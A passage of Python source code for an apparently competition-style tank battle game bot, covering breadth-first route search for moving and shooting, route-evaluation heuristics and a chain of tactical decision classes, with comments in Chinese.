matrixCanMoveTo.astype(np.int8).T) # debug_print("can shoot:\n", matrixCanShoot.astype(np.int8).T) # debug_print("can be destroyed:\n", matrixCanBeDestroyed.astype(np.int8).T) startNode = [ (x1, y1), None, 0, # 初始节点本来就已经到达了 0, # 初始节点不耗费步数 NONE_ACTION, # 对于 start == end 的情况,将返回 startNode,相当于原地等待 ] queue = deque() # queue( [Node] ) matrixMarked = np.zeros_like(matrixMap, dtype=np.bool8) # 标记移动到的位置 if DEBUG_MODE: matrixDistance = np.full_like(matrixMap, -1) queue.append(startNode) # init _foundRoute = False while len(queue) > 0: # if start == (8, 1): # debug_print(start) # debug_print([n[0] for n in queue]) node = queue.popleft() if node[2] > 0: # 还剩 step 步 node[2] -= 1 queue.append(node) # 相当于下一个节点 continue x, y = node[0] if (x, y) == end: _foundRoute = True yield Route(node) continue # 1. 如果当前处在射击区域 # 2. 或者上回合射击(事实上射击行为必定是可延续的,也就是上回合 canShoot 这回合 # 必定应该继续 canShoot ,但是对于 WaterField 来说,不属于可以发动射击的区域 # 因此,如果上回合射进 WaterField 那么上一个判定条件就会失效。但在这种情况下 # 应该视为射击行为延续,因此需要第二个判定条件) # if matrixCanShoot[x, y] or node[4] == SHOOT_ACTION: # 因为在射击区域中,行为的方向都是单向的,不会出现从射击区域进入移动区域, # 或者从射击的下一步移动回到上一步的情况, # 因此没有必要对射击行为已到达过的节点位置进行检查和标记 if DEBUG_MODE: matrixDistance[x, y] = _get_route_length_by_node_chain(node) # 确定射击方向 dx = np.sign(x2 - x) dy = np.sign(y2 - y) x3 = x + dx y3 = y + dy weight = matrixShootWeight[x3, y3] nextNode = [ # 必定可以保证下一个节点仍然处在射击区域,不会到达地图外, (x3, y3), # 并且下次还会继续进入这个分支,除非已经到达基地 node, weight-1, # 补偿 weight, SHOOT_ACTION, # 标志着上一步处在射击区域内 ] if weight == 0: # 射击的过渡动作,下一个动作和当前动作同时发生 queue.appendleft(nextNode) # 添加到开头,下回合马上继续 else: queue.append(nextNode) else: # 否则为非射击区域,属于常规移动区域 if matrixMarked[x, y]: # 只对移动区域进行标记 continue matrixMarked[x, y] = True if DEBUG_MODE: matrixDistance[x, y] = _get_route_length_by_node_chain(node) for dx, dy in get_searching_directions(x1, y1, x2, y2, x_axis_first=x_axis_first, middle_first=middle_first): x3 = x + dx y3 = y + dy if (not (0 <= x3 < width and 0 <= y3 < height) # not in map or not matrixCanMoveTo[x3, y3] ): continue weight = matrixMoveWeight[x3, y3] if weight == INFINITY_WEIGHT: continue queue.append([ (x3, y3), node, weight-1, weight, MOVE_ACTION, # 标志着上一步处在非射击区域内 ]) if not _foundRoute: yield Route() # 空节点 @memorize def find_all_routes_for_move(start, end, matrix_T, block_types=DEFAULT_BLOCK_TYPES, x_axis_first=False, middle_first=False): """ 搜索移动到目标的所有路径 Input: - matrix_T np.array( [[int]] ) 游戏地图的类型矩阵的转置 Yield From: - route Route """ matrixMap = matrix_T matrixWeight = np.ones_like(matrixMap) matrixWeight[matrixMap == Field.BRICK] = 1 + 1 # 射击一回合,移动一回合 matrixWeight[matrixMap == Field.STEEL] = INFINITY_WEIGHT matrixWeight[matrixMap == Field.WATER] = INFINITY_WEIGHT routes = _BFS_search_all_routes_for_move( start, end, matrixMap, matrixWeight, block_types=block_types, x_axis_first=x_axis_first, middle_first=middle_first) yield from routes @memorize def find_all_routes_for_shoot(start, end, matrix_T, block_types=DEFAULT_BLOCK_TYPES, destroyable_types=DEFAULT_DESTROYABLE_TYPES, x_axis_first=False, middle_first=False): """ 搜索移动并射击掉目标的所有路径 输入输出同上 """ matrixMap = matrix_T matrixMoveWeight = np.ones_like(matrixMap) # weight 默认为 1,即移动一回合 matrixMoveWeight[matrixMap == Field.BRICK] = 1 + 1 # 射击一回合,移动一回合 matrixMoveWeight[matrixMap == Field.STEEL] = INFINITY_WEIGHT matrixMoveWeight[matrixMap == Field.WATER] = INFINITY_WEIGHT matrixShootWeight = np.zeros_like(matrixMap) # weight 默认为 0 ,即炮弹可以飞过 matrixShootWeight[matrixMap == Field.BRICK] = 1 + 1 # 射击一回合,冷却一回合 matrixShootWeight[matrixMap == Field.STEEL] = INFINITY_WEIGHT for _type in BASE_FIELD_TYPES: matrixShootWeight[matrixMap == _type] = 1 # 射击一回合,之后就赢了 for _type in TANK_FIELD_TYPES: matrixShootWeight[matrixMap == _type] = 1 + 1 # 射击一回合,冷却一回合 # WARNING: # 这里只是从理论上分析 TANK, BASE 被打掉对应的权重,实际上我们不希望基地和队友 # 被打掉,因此在实际使用时,仅仅在 destroyable_types 中添加敌方的坦克即可 routes = _BFS_search_all_routes_for_shoot( start, end, matrixMap, matrixMoveWeight, matrixShootWeight, block_types=block_types, destroyable_types=destroyable_types, x_axis_first=x_axis_first, middle_first=middle_first) yield from routes def find_shortest_route_for_move(*args, **kwargs): """ 搜索移动到目标的最短路径 """ for route in find_all_routes_for_move(*args, **kwargs): return route # 直接返回第一个 route def find_shortest_route_for_shoot(*args, **kwargs): """ 搜索移动并射击掉目标的最短路径 """ for route in find_all_routes_for_shoot(*args, **kwargs): return route # 直接返回第一个 route def _get_route_length_by_node_chain(node): """ [DEBUG] 传入 node chain head ,计算其所代表的节点链对应的距离 Return: - length int 路线长度,如果是空路线,返回 无穷大长度 """ assert isinstance(node, list) and len(node) == 5 dummyHead = [ NONE_POINT, node, -1, -1, DUMMY_ACTION, ] route = [] node = dummyHead while True: node = node[1] if node is not None: x, y = node[0] weight = node[3] route.append( (x, y, weight) ) else: break if len(route) == 0: return INFINITY_ROUTE_LENGTH return np.sum( r[2] for r in route ) #{ END 'strategy/search.py' }# #{ BEGIN 'strategy/evaluate.py' }# def evaluate_aggressive(battler, oppBattler, strict=False, allow_withdraw=True): """ 根据敌我两架坦克的攻击线路长短,衡量当前侵略性 Input: - battler BattleTank - oppBattler BattleTank - strict bool 是否严格依据路线长度和两方基地位置进行评估 如果为 False ,则还会考虑其他的因素 - allow_withdraw bool 是否允许撤退 Return: [status] - Status.AGGRESSIVE 我方处于攻击状态 - Status.DEFENSIVE 我方处于防御状态 - Status.STALEMENT 双方处于僵持状态 - Status.WITHDRAW 我方处于撤退状态 """ map_ = battler._map BattleTank = type(battler) myRoute = battler.get_shortest_attacking_route() oppRoute = oppBattler.get_shortest_attacking_route() # 可能会遇到这种糟糕的情况,队友挡住了去路 5cdde41fd2337e01c79f1284 #-------------------------- if myRoute.is_not_found() or oppRoute.is_not_found(): return Status.AGGRESSIVE # 应该可以认为是侵略吧 # assert not myRoute.is_not_found() and not oppRoute.is_not_found(), "route not found" leadingLength = oppRoute.length - myRoute.length #debug_print(battler, oppBattler, "leading:", leadingLength) if battler.is_in_enemy_site(): # 在敌方半边地图,更倾向于不防御 if leadingLength >= 1: status = Status.AGGRESSIVE elif leadingLength < -3: status = Status.DEFENSIVE else: status = Status.STALEMENT else: # # 在我方半边地盘,会增加防御的可能性 # 差一步都要算作防御! # if leadingLength >= 1: status = Status.AGGRESSIVE # [1, +) elif -1 < leadingLength < 1: status = Status.STALEMENT # (-1, 1) -> 0 elif -2 <= leadingLength <= -1: status = Status.DEFENSIVE # [-2, -1] else: if allow_withdraw and battler.is_in_our_site(include_midline=True): # 包含中线,放松一点条件 status = Status.WITHDRAW # (-, -2) else: status = Status.DEFENSIVE # 否则不要撤退? if strict: # 严格模式直接返回评估状态 return status # # 撤退性状态直接返回 # if status == Status.WITHDRAW: return status # # 尽可能用攻击性策略! # # 还要判断对方的攻击路线是否可能会被我方队员阻拦 # 否则就过度防御了 5ce69a15d2337e01c7a90646 # if status != Status.AGGRESSIVE: map_ = battler._map tank = battler.tank teammate = None for _tank in map_.tanks[tank.side]: if _tank is not tank: teammate = _tank break if not teammate.destroyed: teammateBattler = BattleTank(teammate) for action in teammateBattler.get_all_valid_move_actions() + [ Action.STAY ]: with map_.simulate_one_action(teammateBattler, action): if teammateBattler.xy in oppRoute: # 此时视为侵略模式 return Status.AGGRESSIVE return status def estimate_route_similarity(route1, route2): """ 评估两条路线的相似度 一般用于判断选择某条路线是否可以和敌人相遇 实现思路: -------------- 首先找出两者中最短的一条路径,对于其上每一个点,在另一条路上寻找与之距离最短(曼哈顿距离即可) 的点,并将这两个点之间的距离作为总距离的一个部分,每个分距离和相应点的权重的加权平均值即为总距离 最后的估值为 总距离除以最短路线的坐标点数的均值 的倒数 值越接近 1 表示越相近,值越接近 0 表示越不相近 根据实际情景的需要,我们将较长路劲多出来的那些点忽略 ... TODO: ------------- 1. 如何考虑坐标权重 2. 如何考虑长路径中多出来的那些点 """ route1 = [ (node.x, node.y, node.weight) for node in route1 ] route2 = [ (node.x, node.y, node.weight) for node in route2 ] if len(route1) > len(route2): # 确保 route1 坐标数不超过 route2 route1, route2 = route2, route1 total = 0 for x1, y1, weight in route1: d = np.min([ get_manhattan_distance(x1, y1, x2, y2) for x2, y2, _ in route2 ]) total += d * weight return 1 / ( total / len(route1) + 1 ) def estimate_enemy_effect_on_route(route, player): """ 衡量敌人对我方所选的进攻路线的影响程度 ---------------------------------------- 敌人在进攻路线两侧,可能会阻碍进攻,也就是增加了相应路线进攻的回合数, 因此敌人的影响可以量化为相应路线长度的增加量。 将理论路线长度与敌人的影响所导致的长度增加量相加,所得的估值可以认为是 考虑了敌人影响后的真实路线长度,可以将这个真实路线长度对所选路线进行重新 排序,从而选出距离短,且受敌人影响最小的攻击路线 如何估计敌人影响? ------------------ 收集敌人当前所在位置所能影响到(近乎可认为是能射击到)的坐标。为了确保更加接近真实的情况, 再假设敌人当前回合能射击,模拟敌人所有可以执行的动作(包括移动和射击,考虑射击是因为有可能可以 摧毁一些土墙),之后同法收集敌人所能影响到的坐标。将这一坐标集所对应的区域视为受到敌人影响的区域。 随后统计当前路径与该坐标集的重叠程度(路径上的坐标出现在该坐标集内的,可视为重叠。这种路径节点的 数量越多,重叠程度越大),并认为这一重叠程度与敌人的影响程度正相关,也就是重叠的坐标点数与 路径长度的增长量正相关,从而实现量化估计。 特别的,如果敌人出现在攻击路线上,会造成较大的路线长度增加,有时甚至可以视为此路不通。 TODO: --------- 这种简单的静态分析策略可能存在对某些具体情况估计不到位的问题。当我方坦克沿着这条路线走到需要和 敌人正面交锋的位置时,有的时候可以通过闪避直接躲开,这种情况的影响可能比较小。而有的情况下是无法躲开的, 我方坦克只能选择往回闪避,这就相当于判定了这条路为死路 5cd24632a51e681f0e912613 (然而事实上情况还可以更加复杂,因为实际进攻的时候,有可能会采用一些特殊的策略,让这条路转化为活路, 例如预先打掉与我距离为 2 的墙)。 而在静态分析中,这些具体的差别可能无法区分,因此和更加真实合理的估计间可能存在着一定的差距。 但是采用动态分析可能不是一件很现实的事情,因为需要不断地模拟移动和模拟决策,一方面会造成算法过于 耗时,一方面也有可能会引入各种混乱(实现无差异地在多回合模拟移动和模拟决策间回滚,并且确保面向真实情况 决策的代码也能适用于模拟决策的情况,这将会是一个浩大的工程)。 Input: - route Route 待评估的路线 - player Tank2Player 将会采用这条路线的玩家对象 """ map_ = player._map # 通过玩家对象引入 map 全局对象 LENGTH_INCREMENT_OF_ENEMY_INFLUENCED = 1 # 受到敌人射击影响所导致的路线长度增量 LENGTH_INCREMENT_OF_ENEMY_BLOCKING = 10 # 敌人位于路线上所导致的路线长度增量 enemyInfluencedPoints = set() # 受敌人影响的坐标集 enemyBlockingPoints = set() # 敌人阻塞的坐标集 for oppBattler in [ oppPlayer.battler for oppPlayer in player.opponents ]: if oppBattler.destroyed: continue with map_.simulate_one_action(oppBattler, Action.STAY): # 刷新射击回合 for action in oppBattler.get_all_valid_actions(): # 包含了原地停止 with map_.simulate_one_action(oppBattler, action): with map_.simulate_one_action(oppBattler, Action.STAY): # 同理刷新冷却 enemyBlockingPoints.add( oppBattler.xy ) # blocking enemyInfluencedPoints.add( oppBattler.xy ) # 先加入敌人当前坐标 for dx, dy in get_searching_directions(*oppBattler.xy): x, y = oppBattler.xy while True: x += dx y += dy if not map_.in_map(x, y): break fields = map_[x, y] if len(fields) == 0: pass elif len(fields) > 1: # 两个以上敌人,不划入影响范围,并直接结束 break else: field = fields[0] if isinstance(field, EmptyField): pass elif isinstance(field, WaterField): continue # 水路可以认为不影响 #elif isinstance(field, (BaseField, BrickField, SteelField, TankField) ): else: break # block 类型,不划入影响范围,并直接结束 enemyInfluencedPoints.add( (x, y) ) # 以 pass 结尾的分支最后到达这里 realLength = route.length # 初始为路线长度 for node in route: xy = node.xy if xy in enemyInfluencedPoints: if node.weight > 0: # 射击的过渡点 weight == 0 它,它实际上不受敌人射击的影响 realLength += LENGTH_INCREMENT_OF_ENEMY_INFLUENCED if xy in enemyBlockingPoints: # 敌人阻塞,可以影响射击点,因此同等对待 realLength += LENGTH_INCREMENT_OF_ENEMY_BLOCKING return realLength def estimate_route_blocking(route): """ 评估路线上 block 类型块的数量 ---------------------------- 被用于撤退路线的评估 撤退行为发生在己方基地,不宜过度攻击墙,否则可能会削弱基地的防御性 实现方法 ------------- 让 block 类型的块的权重增加,这样就可以让 block 更多的路线的长度增加 TODO: 是否对含有相同 block 的路线上的 block 进行进一步的评估?也就是认为基地外围的 block 的权重更高? """ x2, y2 = route.end LENGTH_INCREMENT_OF_BLOCK = 1 # 遇到墙,权重加 1 LENGTH_INCREMENT_OF_INNERMOST_BLOCK = 2 # 遇到最内层的墙,权重加 2 realLength = route.length for node in route: x1, y1 = node.xy if node.weight == 2: # 权重为 2 的块一定是 block 类型 if np.abs(x1 - x2) <= 1 and np.abs(y1 - y2) <= 1: # 位于 end 的外围 realLength += LENGTH_INCREMENT_OF_INNERMOST_BLOCK else: realLength += LENGTH_INCREMENT_OF_BLOCK return realLength #{ END 'strategy/evaluate.py' }# #{ BEGIN 'decision/abstract.py' }# class DecisionMaker(object): """ 决策者的抽象基类 ---------------- 泛指一切具有决策能力的对象,可以是具象的,例如 Team, Player 也可以是抽象的,例如决策类 该类的派生类对特定的决策代码段进行封装 如果派生类是决策类,那么将实现对决策逻辑的拆分,以此来提高决策树的清晰度,提高决策逻辑的复用性 """ UNHANDLED_RESULT = None def __init__(self, *args, **kwargs): if self.__class__ is __class__: raise NotImplementedError def is_handled(self, result): """ 用于判断决策对象返回的结果是否标志着该决策适用于当前情况,用于被外部判断 规定当该决策对象不能 handle 时,返回 __class__.UNHANDLED_RESULT 那么只需要判断实际返回值是否与之相等,即可判断该情况是否被 handle """ return result != self.__class__.UNHANDLED_RESULT def _make_decision(self): """ 真正用于被派生类重载的抽象决策接口 如果该情况不适用,那么不需要写任何返回值,函数默认返回 None make_decision 函数将以此来判断该情况是否被 handle """ raise NotImplementedError def make_decision(self): """ 外部可调用的决策接口 ---------------------- 会对 _make_decision 的结果进行一些统一的处理,也可以用于在决策前后进行一些预处理和后处理操作 此处提供一个默认的情况的处理方法: ---------------------------------- - 如果真正的决策函数返回了一个 action ,则将其作为最终结果直接返回 - 如果当前情况不适用,真正的决策函数返回了 None ,则返回 UNHANDLED_RESULT """ res = self._make_decision() if res is None: return self.__class__.UNHANDLED_RESULT return res class SingleDecisionMaker(DecisionMaker): """ 单人决策者的抽象基类,用于 Tank2Player 的个人决策 """ UNHANDLED_RESULT = Action.INVALID def __init__(self, player, signal): """ 重写的构造函数,确保与 Tank2Player._make_decision 接口的参数列表一致 Input: - player Tank2Player 单人玩家实例 - signal int 团队信号 """ self._player = player self._signal = signal if self.__class__ is __class__: raise NotImplementedError class RespondTeamSignalDecisionMaker(SingleDecisionMaker): """ 用于处理团队信号的决策模型 注意: ------------ """ UNHANDLED_RESULT = ( Action.INVALID, Signal.INVALID ) HANDLED_SIGNALS = ( ) # 将会处理到的团队信号 def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) if self.__class__ is __class__: raise NotImplementedError def make_decision(self): """ 通常来说,如果团队发送了一个信号,必须及时返回一个结果 只有在 signal is None 的情况下,才返回 UNHANDLED_RESULT """ res = self._make_decision() if res is None: signal = self._signal if signal in self.__class__.HANDLED_SIGNALS: # 团队信号必须得到响应 raise Exception("team signal %d must be responded" % signal) return self.__class__.UNHANDLED_RESULT return res class TeamDecisionMaker(DecisionMaker): """ 团队决策的抽象基类,用于 Tank2Team 的双人决策 TeamDecision 与 SingleDecision 不一样,它不存在最优的决策者, 而是所有决策者都会尝试进行一次决策。决策存在高低优先级,高优先级的决策者 如果对某个 player 的行为进行了协调,那么低优先级的决策者不应该覆盖高优先级 决策者的现有决策结果(当然极其特殊的决策者例外)。 如果使用 DecisionChain 进行多个团队决策者的连续决策, 那么整个决策链上的所有决策者必定都会进行一次决策。 """ def __init__(self, team): self._team = team # Tank2Team if self.__class__ is __class__: raise NotImplementedError def is_handled(self, result): """ 为了适应 DecisionChain 的决策,这里重写 is_handled 函数 使得无论如何都可以让 DecisionChain 继续 """ return False def _make_decision(self, *args, **kwargs): """ 派生类重写的 _make_decision 要求返回值必须是 [int, int] """ raise NotImplementedError return [ Action.INVALID, Action.INVALID ] def make_decision(self): """ 重写 makd_decision 接口 确保在决策完成后 player1, player2 的决策结果与返回结果同步 这主要考虑到在决策的时候可能会忘记 create_snapshot ... """ team = self._team player1, player2 = team.players action1, action2 = self._make_decision() player1.set_current_decision(action1) player2.set_current_decision(action2) return [ action1, action2 ] #{ END 'decision/abstract.py' }# #{ BEGIN 'decision/chain.py' }# class DecisionChain(DecisionMaker): """ 决策链 ------------- 效仿责任链模式,对多个决策实例进行组合,按优先级顺序依次进行决策 如果遇到一个符合条件的决策,则将其决策结果返回,否则继续尝试低优先级的决策 """ UNHANDLED_RESULT = None def __init__(self, *decisions): self._decisions = decisions for decision in self._decisions: # 确保所有的 decision 实例均为 DecisionMaker 的派生 assert isinstance(decision, DecisionMaker) def _make_decision(self): for decision in self._decisions: res = decision.make_decision() if decision.is_handled(res): return res #{ END 'decision/chain.py' }# #{ BEGIN 'decision/single/leave_teammate.py' }# class LeaveTeammateDecision(RespondTeamSignalDecisionMaker): """ 处理两人重叠的情况 -------------------- 1. 尝试采用安全的移动行为离开队友 2. 避免和队友采用相同的移动方向 3. 尽量往不导致进攻路线增加的方向移动 """ HANDLED_SIGNALS = ( Signal.SHOULD_LEAVE_TEAMMATE, ) def _make_decision(self): player = self._player signal = self._signal map_ = player._map battler = player.battler teammate = player.teammate if signal == Signal.SHOULD_LEAVE_TEAMMATE: actions = [] for action in battler.get_all_valid_move_actions(): if not Action.is_move(player.try_make_decision(action)): # 存在风险 continue if action == teammate.get_current_decision(): # 不能与队友的移动方向相同! continue actions.append(action) if len(actions) == 0: # 没有合理的离开行为 ... return ( Action.STAY, Signal.CANHANDLED ) route1 = battler.get_shortest_attacking_route() deltaLengths = {} # action -> deltaLength for action in actions: with map_.simulate_one_action(battler, action): route2 = battler.get_shortest_attacking_route() # 必定有路? deltaLengths[action] = route2.length - route1.length # 移动后进攻路线短变短者值小 action = min( deltaLengths.items(), key=lambda kv: kv[1] )[0] player.set_status(Status.READY_TO_LEAVE_TEAMMATE) return ( action, Signal.READY_TO_LEAVE_TEAMMATE ) #{ END 'decision/single/leave_teammate.py' }# #{ BEGIN 'decision/single/attack_base.py' }# class AttackBaseDecision(SingleDecisionMaker): """ 特殊情况决策,当下一步就要拆掉敌方基地时 """ def _make_decision(self): player = self._player battler = player.battler # TODO: # 可能需要考虑一种特殊情况: 队友被杀,自己下一步打掉对方基地,但是对方下一步把我干掉 # 这种情况下,即使我方拆掉对方基地也算平局。也许可以考虑先闪避一回合,然后再继续拆家。 # if battler.is_face_to_enemy_base() and battler.canShoot: player.set_status(Status.READY_TO_ATTACK_BASE) # 特殊状态 return battler.get_next_attacking_action() # 必定是射击 ... #{ END 'decision/single/attack_base.py' }# #{ BEGIN 'decision/single/encount_enemy.py' }# class EncountEnemyDecision(SingleDecisionMaker): """ 遭遇敌人时的决策 """ def _make_decision(self): player = self._player signal = self._signal map_ = player._map tank = player.tank battler = player.battler teammate = player.teammate Tank2Player = type(player) BattleTank = type(battler) aroundEnemies = battler.get_enemies_around() if len(aroundEnemies) > 0: player.set_status(Status.ENCOUNT_ENEMY) if len(aroundEnemies) > 1: # 两个敌人,尝试逃跑 assert len(aroundEnemies) == 2 # 可能会遇到极其罕见的三人重叠 # 首先判断是否为真正的双人夹击 enemy1, enemy2 = aroundEnemies x, y = tank.xy x1, y1 = enemy1.xy x2, y2 = enemy2.xy # 先判断敌人是否重叠,如果是,那么很有可能直接击杀! if (x1, y1) == (x2, y2): if (not teammate.defeated # 队友还没有死,自己可以考虑牺牲 and battler.canShoot ): player.set_status(Status.ENCOUNT_TWO_ENEMY) player.set_status(Status.READY_TO_DOUBLE_KILL_ENEMIES) player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(enemy1) if x1 == x2 == x: if (y > y1 and y > y2) or (y < y1 and y < y2): player.set_status(Status.ENCOUNT_ONE_ENEMY) pass # 实际可视为一个人 elif y1 == y2 == y: if (x > x1 and x > x2) or (x < x1 and x < x2): player.set_status(Status.ENCOUNT_ONE_ENEMY) pass else: # 真正的被夹击 player.set_status(Status.ENCOUNT_TWO_ENEMY) oppBattlers = [ BattleTank(_enemy) for _enemy in aroundEnemies ] if all( oppBattler.canShoot for oppBattler in oppBattlers ): # 如果两者都有弹药,可能要凉了 ... player.set_status(Status.DYING) if battler.canShoot: # TODO: 这种情况下有选择吗? player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(enemy1) # 随便打一个? elif all( not oppBattler.canShoot for oppBattler in oppBattlers ): # 均不能进攻的话,优先闪避到下回合没有敌人的位置(优先考虑拆家方向) firstMoveAction = tuple() attackAction = battler.get_next_attacking_action() if Action.is_move(attackAction): # 如果是移动行为 firstMoveAction = ( attackAction, ) for action in firstMoveAction + Action.MOVE_ACTIONS: if map_.is_valid_move_action(tank, action): with map_.simulate_one_action(tank, action): if len( battler.get_enemies_around() ) < 2: # 一个可行的闪避方向 player.set_status(Status.READY_TO_DODGE) return action # 均不能闪避,应该是处在狭道内,则尝试任意攻击一个 if battler.canShoot: # TODO: 是否有选择? player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(enemy1) # 随便打一个 else: # 有一个能射击,则反击他 for oppBattler in oppBattlers: if oppBattler.canShoot: # 找到能射击的敌人 actions = battler.try_dodge(oppBattler) if len(actions) == 0: # 不能闪避 if battler.canShoot: player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(oppBattler) else: # 要凉了 ... break elif len(actions) == 1: action = player.try_make_decision(actions[0]) else: action = player.try_make_decision(actions[0], player.try_make_decision(actions[1])) if Action.is_move(action): # 统一判断 player.set_status(Status.READY_TO_DODGE) return action # 没有办法?尝试反击 if battler.canShoot: player.set_status(Status.READY_TO_FIGHT_BACK) return battler.shoot_to(oppBattler) else: # 要凉了 break # 没有办法对付 .. player.set_status(Status.DYING) # 无所谓的办法了... return player.try_make_decision(battler.get_next_attacking_action()) # TODO: # 虽然说遇到了两个一条线上的敌人,但是这不意味着后一个敌人就没有威胁 5ccee460a51e681f0e8e5b17 # 当前情况: # --------- # 1. 敌人数量为 2 但是一个处在另一个身后,或者重叠,可视为一架 # 2. 敌人数量为 1 # if len(aroundEnemies) == 1: oppTank = aroundEnemies[0] else: # len(aroundEnemies) == 2: oppTank = battler.get_nearest_enemy() oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) # # (inserted) 判断上回合敌人是否和我重叠,用于标记敌人 5ce52a48d2337e01c7a714c7 # if (player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1) and not player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=2) and not Action.is_move(player.get_previous_action(back=1)) # 且不是因为我方主动打破重叠导致 ): # 上回合刚刚进入重叠,这回合就被打破 with map_.rollback_to_previous(): if oppTank is battler.get_overlapping_enemy(): oppPlayer.add_labels(Label.IMMEDIATELY_BREAK_OVERLAP_BY_MOVE) # # 在非 WITHDRAW 的情况下,评估当前侵略性 # if not player.has_status(Status.WITHDRAW): _allowWithdraw = ( WithdrawalDecision.ALLOW_WITHDRAWAL and not player.has_label(Label.DONT_WITHDRAW) ) status = evaluate_aggressive(battler, oppBattler, allow_withdraw=_allowWithdraw) player.set_status(status) else: status = Status.WITHDRAW # 侵略模式/僵持模式 #---------- # 1. 优先拆家 # 2. 只在必要的时刻还击 # 3. 闪避距离不宜远离拆家路线 # if status == Status.AGGRESSIVE or status == Status.STALEMENT: if not oppBattler.canShoot: # 如果能直接打死,那当然是不能放弃的!! if len( oppBattler.try_dodge(battler) ) == 0: # 必死 if battler.canShoot: player.set_status(Status.READY_TO_KILL_ENEMY) return battler.shoot_to(oppBattler) attackAction = battler.get_next_attacking_action() # 其他情况,优先进攻,不与其纠缠 realAction = player.try_make_decision(attackAction) # 默认的进攻路线 if Action.is_stay(realAction): # 存在风险 if Action.is_move(attackAction): # # 原本移动或射击,因为安全风险而变成停留,这种情况可以尝试射击,充分利用回合数 # # TODO: # 实际上,很多时候最佳路线选择从中线进攻,但从两侧进攻也是等距离的, # 在这种情况下,由于采用从中线的进攻路线,基地两侧的块并不落在线路上,因此会被 # 忽略,本回合会被浪费。但是进攻基地两侧的块往往可以减短路线。因此此处值得进行 # 特殊判断 # fields = battler.get_destroyed_fields_if_shoot(attackAction) route = battler.get_shortest_attacking_route() for field in fields: if route.has_block(field): # 为 block 对象,该回合可以射击 action = player.try_make_decision(battler.shoot_to(field)) if Action.is_shoot(action): player.set_status(Status.PREVENT_BEING_KILLED) player.set_status(Status.KEEP_ON_MARCHING) return action # TODO: 此时开始判断是否为基地外墙,如果是,则射击 for field in fields: if battler.check_is_outer_wall_of_enemy_base(field): action = player.try_make_decision(battler.shoot_to(field)) if Action.is_shoot(action): player.set_status(Status.PREVENT_BEING_KILLED) player.set_status(Status.KEEP_ON_MARCHING) return action # 刚刚对射为两回合,该回合双方都没有炮弹,尝试打破僵局 #--------------------------------------------------- # 当前为侵略性的,并且在对方地盘,尝试回退一步,与对方重叠。 # 后退操作必须要有限制 5cd10315a51e681f0e900fa8 # # 如果一直回头,尝试在这一步选择非回头的其他行为 5ced8eee641dd10fdcc7907f # if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=3) and Action.is_stay(player.get_previous_action(back=2)) # 还需要检查两者上上回合是否为等待 and Action.is_stay(oppPlayer.get_previous_action(back=2)) # 避免将边移动边对射的情况考虑进来 and battler.is_in_enemy_site() # 添加必须在对方地盘的限制,避免在我方地盘放人 and player.has_status(Status.AGGRESSIVE) # 只有侵略性的状态可以打破僵局 ): # 判断是否为反复回头 if player.has_status_recently(Status.READY_TO_BACK_AWAY, turns=6): # 最近几回合内是否曾经回头过 player.add_labels(Label.ALWAYS_BACK_AWAY) if (player.has_label(Label.ALWAYS_BACK_AWAY) and not battler.is_in_our_site(include_midline=True) # 严格不在我方基地 ): # 考虑用闪避的方式代替后退 for action in battler.try_dodge(oppBattler): realAction = player.try_make_decision(action) if Action.is_move(realAction): player.set_status(Status.TRY_TO_BREAK_ALWAYS_BACK_AWAY) player.remove_labels(Label.ALWAYS_BACK_AWAY) # 删掉这个状态 return realAction # 否则继续回头 backMoveAction = battler.back_away_from(oppBattler) action = player.try_make_decision(backMoveAction) if Action.is_move(action): player.set_status(Status.READY_TO_BACK_AWAY) return action if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=1) # 上回合正在和对方对射 and not battler.canShoot # 但是我方本回合不能射击 and not oppBattler.canShoot # 并且对方本回合不能射击 ): player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 保持对射状态,用于后方打破僵持 # 其余情况照常 player.set_status(Status.PREVENT_BEING_KILLED) return realAction # 否则不予理会,直接移动或者反击 action = player.try_make_decision(battler.get_next_attacking_action()) if not Action.is_stay(action): # 补丁 #---------------------------- # 针对两者距离为 2 的情况,不能一概而论! # if status == Status.STALEMENT: # 僵持模式考虑堵路 _route = battler.get_route_to_enemy_by_move(oppBattler) if _route.is_not_found(): _route = battler.get_route_to_enemy_by_move(oppBattler, block_teammate=False) assert not _route.is_not_found(), "route not found ?" # 必定能找到路! assert _route.length > 0, "unexpected overlapping enemy" if _route.length == 2: if not player.is_suitable_to_overlap_with_enemy(oppBattler): # 更适合堵路 player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # 其他情况均可以正常移动 #player.set_status(Status.KEEP_ON_MARCHING) #return action return # 直接抛出让后面的 decision 处理,当做没有这个敌人 # 不能移动,只好反击 action = player.try_make_decision(battler.shoot_to(oppBattler)) if Action.is_shoot(action): player.set_status(Status.READY_TO_FIGHT_BACK) return action else: # 对方有炮弹,需要分情况 5ccb3ce1a51e681f0e8b4de1 #----------------------------- # 1. 如果是侵略性的,则优先闪避,并且要尽量往和进攻路线方向一致的方向闪避,否则反击 # 2. 如果是僵持的,那么优先堵路,类似于 Defensive # # TODO: # 可能需要团队信号协调 5ccc30f7a51e681f0e8c1668 # if status == Status.STALEMENT: # # 首先把堵路的思路先做了,如果不能射击,那么同 aggressive # # TODO: # 有的时候这并不是堵路,而是在拖时间! 5ccf84eca51e681f0e8ede59 # 上一回合保持重叠,但是却被敌人先过了,这种时候不宜僵持,应该直接走人 # 这种情况下直接转为侵略模式! # if (player.has_status_in_previous_turns(Status.OVERLAP_WITH_ENEMY, turns=1) and (player.has_status_in_previous_turns(Status.READY_TO_BLOCK_ROAD, turns=1) or player.has_status_in_previous_turns(Status.KEEP_ON_OVERLAPPING, turns=1)) ): pass # 直接过到侵略模式 else: # 否则算作正常的防守 # # TODO: # 射击不一定正确,因为敌人可能上回合刚把我过掉,此时应该考虑主动闪走! # 5ce4e66cd2337e01c7a6abd7 # if battler.canShoot: # # (inserted) 先看上回合是不是刚被对方过掉 # _justBreakOverlap = False with 